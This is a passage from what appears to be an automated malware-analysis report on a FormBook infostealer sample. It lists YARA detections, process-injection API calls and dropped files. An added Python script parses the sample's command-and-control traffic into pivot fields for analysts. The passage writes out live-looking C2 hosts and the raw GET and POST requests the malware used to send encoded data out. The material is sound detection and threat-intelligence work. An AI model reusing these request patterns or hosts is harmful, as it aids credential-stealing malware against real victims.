Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/parking-skylt.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/website.svg
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/footer/logo-grey.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/js/respond-js/respond.src.js
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/styles/extra-pages-alt.css
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp | String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
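Two things in the network evidence above are worth separating from the noise before anyone writes indicators. The only hosts actually contacted are www.chelsescompass.com and www.snacklabbet.com, both on the same path /dfc/ with the same parameter names (D8P, qL0 on the GETs, D8P in the POST body), the GETs carry no User-Agent while the POSTs use an Internet Explorer 11 (Trident/7.0) string and point Origin and Referer back at the same host. The font-vendor URLs come from explorer.exe memory, a process the sample injected into, and read as font metadata rather than malware configuration; the loopia.com / loopia.se strings in cscript.exe memory, together with the LOOPIASE ASN, are consistent with a parked-domain page being returned for one of the contacted hosts (an inference from this report, not something it states). The Python below is an added example for this page, not Joe Sandbox code: it takes the three requests shown above, with their line breaks restored, and reduces each to the fields an analyst pivots on, then groups hosts by path. Nothing about the parameter encoding is decoded or assumed.

```python
from urllib.parse import parse_qs, urlsplit

# Requests from this report, line breaks restored (constructed sample input; the
# POST body is the Data Ascii shown for the 409-byte POST, not the 185341-byte one).
GET_CHELSES = (
    "GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg"
    "&qL0=gjqP-lQha6A HTTP/1.1\r\n"
    "Host: www.chelsescompass.com\r\nConnection: close\r\n\r\n"
)
GET_SNACK = (
    "GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf"
    "&qL0=gjqP-lQha6A HTTP/1.1\r\n"
    "Host: www.snacklabbet.com\r\nConnection: close\r\n\r\n"
)
POST_SNACK = (
    "POST /dfc/ HTTP/1.1\r\nHost: www.snacklabbet.com\r\nConnection: close\r\n"
    "Content-Length: 409\r\nCache-Control: no-cache\r\nOrigin: http://www.snacklabbet.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    "Referer: http://www.snacklabbet.com/dfc/\r\nAccept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\n\r\n"
    "D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROC"
    "MC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_"
    "Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_"
    "Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw)."
)


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def profile(raw: str) -> dict:
    """Reduce a request to pivot fields: host, path, parameter names (query for GET,
    form body for POST), User-Agent, and whether Origin/Referer point back at the host."""
    req = parse_request(raw)
    url = urlsplit(req["target"])
    h = req["headers"]
    host = h.get("host", "")
    source = req["body"] if req["method"] == "POST" else url.query
    return {
        "method": req["method"],
        "host": host,
        "path": url.path,
        "param_keys": list(parse_qs(source, keep_blank_values=True)),
        "user_agent": h.get("user-agent"),
        "connection_close": h.get("connection", "").lower() == "close",
        "self_origin": h.get("origin") == f"http://{host}",
        "self_referer": h.get("referer") == f"http://{host}{url.path}",
    }


def hosts_by_path(profiles) -> dict:
    """Group contacted hosts by URI path. A path shared across unrelated hosts, as
    /dfc/ is here, is a stronger pivot than either domain on its own."""
    grouped = {}
    for p in profiles:
        grouped.setdefault(p["path"], set()).add(p["host"])
    return grouped


if __name__ == "__main__":
    profiles = [profile(r) for r in (GET_CHELSES, GET_SNACK, POST_SNACK)]
    for p in profiles:
        print(p["method"], p["host"], p["path"], p["param_keys"], "UA:", p["user_agent"])
    print(hosts_by_path(profiles))
```

The GET profiles come back with no User-Agent and two parameter names, the POST with the Trident User-Agent, a single form field and both self-referencing headers, and the grouping puts both domains under /dfc/.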

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same 11 memory dumps and 4 unpacked PEs listed under AV Detection above

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cscript.exeDropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cscript.exeDropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Doc11.exe; Code function: 0_2_05001C09 CreateProcessW, NtQueryInformationProcess, NtReadVirtualMemory, NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtTerminateProcess, NtUnmapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtResumeThread
Source: C:\Users\user\Desktop\Doc11.exe; Code function: 0_2_050000AD NtOpenSection, NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419CA0 NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419D50 NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419DD0 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419E80 NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419C9A NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419D4A NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419DCC NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00419E7A NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169A20 NtResumeThread, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031699A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031698F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031697A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031696E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031695D0 NtClose, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169B00 NtSetValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0316A3B0 NtGetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169A10 NtQuerySection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169A80 NtOpenDirectoryObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169950 NtQueueApcThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031699D0 NtCreateProcessEx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169820 NtEnumerateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0316B040 NtSuspendThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031698A0 NtWriteVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0316A710 NtOpenProcessToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169730 NtQueryVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169770 NtSetInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0316A770 NtOpenThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169760 NtOpenProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169FE0 NtCreateMutant
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169610 NtEnumerateValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169650 NtQueryValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169670 NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031696D0 NtCreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0316AD30 NtSetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169520 NtWaitForSingleObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03169560 NtWriteFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_031695F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C295D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29560 NtWriteFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C296D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C296E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29610 NtEnumerateValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29770 NtSetInformationFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C299A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29B00 NtSetValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C295F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C2AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C297A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29760 NtOpenProcess
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C2A770 NtOpenThread
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C2A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C298F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C298A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C2B040 NtSuspendThread
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29820 NtEnumerateKey
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C299D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29950 NtQueueApcThread
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29A10 NtQuerySection
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C29A20 NtResumeThread
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_04C2A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19CA0 NtCreateFile
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19DD0 NtClose
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19D50 NtReadFile
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19E80 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19C9A NtCreateFile
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19DCC NtClose
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19D4A NtReadFile
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_00B19E7A NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: String function 0312B150 appears 45 times
Source: C:\Windows\SysWOW64\cscript.exe; Code function: String function 04BEB150 appears 45 times
Source: Doc11.exe, 00000000.00000002.196411457.0000000005D60000.00000004.00000001.sdmp; Binary or memory string: OriginalFilename PGzTmRHSQnoDrXlf.bounce.exe vs Doc11.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Section loaded: sfc.dll
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
